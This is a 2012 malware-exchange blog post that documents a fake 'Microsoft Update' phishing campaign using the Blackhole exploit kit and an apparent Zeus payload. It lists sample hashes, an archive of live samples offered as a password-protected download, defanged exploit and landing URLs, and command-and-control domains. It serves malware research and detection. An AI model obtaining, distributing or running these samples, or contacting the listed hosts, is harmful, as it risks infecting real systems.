About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become s useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Sunday, April 29, 2012

018 Crime "Microsoft Update" phish -> Blackhole exploit kit with Zeus payload - web - April 2012

File: KB971033.exe
Size: 201216
MD5:  EC750B75E83749C715D7834E130FCE8E

File: hnszs0.exe
Size: 184832
MD5:  9DB4174373601F74FCE0ECBC77A9577D

Sample credit Bryan Nolen

Download (pass infected)

│   investigation_notes.txt

│   ├───exe
│   │       hnszs0.exe
│   │       KB971033.exe
│   │
│   ├───java
│   │       jar_cache.zip
│   │
│   ├───pdf
│   │       ap1.pdf
│   │       ap2.pdf
│   │
│   └───swf
│           score.swf

│       MSUPDATE.eml

│       pid_1412_Explorer_Dumped.EXE

│       exploit.html
│       landing.html


Quick analysis made by Bryan Nolen

Landing page (hxxp://volozhin.gov.by/pub/KB971033/?clien-e=3D1093821896211 and saved as html/landing.html) contains a hidden IFRAME that leads to the exploit page. This landing page also contains a META REFRESH that leads to another suspect binary (hxxp://volozhin.gov.by/pub/KB971033/KB971033.exe saved as dropped_files/exe/KB971033.exe) - detection on this second binary is low ( https://www.virustotal.com/file/0e14f5e6cdab9218135d3a7eed11f0457c9934210859f6075d63bc609469d43b/analysis/1335596875/ )

Exploit page (hxxp://fewfewfewfew.ibiz.cc/main.php?page=95fc4549d83b0486 and saved as html/exploit.html) utilises a trio of exploits designed to attack java, adobe acrobat, or flash.

Analysis of the javascript was perfomed with the assistance of URLQUERY report link (http://urlquery.net/report.php?id=47909).

The attack payloads are saved as
  • dropped_files/pdf/ap1.pdf 
  • dropped_files/pdf/ap2.pdf 
  • dropped_files/swf/score.swf 
  • dropped_files/java/jar_cache.zip

The "final" malicious payload is saved as (dropped_files/exe/hnszs0.exe) and its detection is VERY poor ( https://www.virustotal.com/file/c48df0394939fccb9a3ac0853d0ae696d04e7c5230d3a6468ebce257a0be4ccc/analysis/1335598639/ )

A copy of explorer.exe extracted from the memory image after infection is included, based on observations this is the process it migrated into after infection. It is saved in (extracted_files/pid_1412_Explorer_Dumped.EXE)

PCAP is supplied in the pcap folder. The hosts identified in this malware are:

Landing Page:    volozhin.gov.by
Exploit Page:    fewfewfewfew.ibiz.cc
C2:        google-analytics-sv1.com
(alt C2):    localdomain01.com

Note: the Alternate C2 was seen in earlier investigations of this malware and changed to the C2 address above when this round of investigation was performed.

Full memory dumps from my sandbox VM avaliable on request.

I have a strong suspicion this is a Zeus varient.

-Bryan Nolen <bryan _at_ arc .dot. net .dot. au>

    Belarus    AS12406 Business network j.v.    Business Network JV
   Russian Federation    AS28762 AWAX Telecom Ltd    AWAX Telecom Ltd.

Russian Federation    AS57189 PE Spiridonova Vera Ana    OOO Aldevir Invest
localdomain01.com Russian Federation    AS57189 PE Spiridonova Vera Ana    OOO Aldevir Invest